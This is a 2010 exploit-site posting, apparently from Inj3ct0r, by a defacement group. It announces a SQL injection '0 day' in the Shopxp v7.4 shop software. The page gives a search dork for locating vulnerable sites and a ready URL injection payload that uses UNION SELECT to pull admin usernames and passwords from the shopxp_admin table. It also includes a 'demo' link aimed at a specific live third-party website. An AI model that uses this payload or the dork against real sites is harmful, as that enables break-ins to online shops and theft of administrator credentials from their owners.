Home / os / win7

Shopxp v7.4 SQL Injection Vulnerability

Posted on 09 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Shopxp v7.4 SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================
Shopxp v7.4 SQL Injection Vulnerability
=======================================


####################################
[+] Title: Shopxp v7.4 SQL injection 0 day

[+] Date:  09.06.2010
[+] Author: OwneR
[+] Software Link:  
[+] Tested Windows Xp
[+] Where : From Remote
####################################
[~] Founded by OwneR
[~] Team: Kosova Defacers Group - KDG
[~] Contact: owner-kdg[at]hotmail[dot]com
[~] Home: www.kdg-cr3w.org

#####Exploit by OwneR######

[~] DORK: &quot;inurl:&quot;inurl:shopxp_news.asp&quot;

####################################


[~]ExPl0iT : /TEXTBOX2.ASP?action=modify&amp;news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

[~]Dem0:  http://www.qiangtie531.com/TEXTBOX2.ASP?action=modify&amp;newsid=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin


####################################
[+]Special Thanks:phantom - lirimix - raper - mr.pirat - lindox - hackmon - cracker-besi - GP - v1agra - MaTr!x - H4ncook - B1g.Don1
####################################
[+]Greetz To :KHG, L0whacker, mR.Bleard, h0ax b00t3r, RBH-crew, www.kdg-cr3w.org, www.inj3ct0r.com

####################################
[+]Proud 2 b3:Albanian &amp; Muslim
#################################### 


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :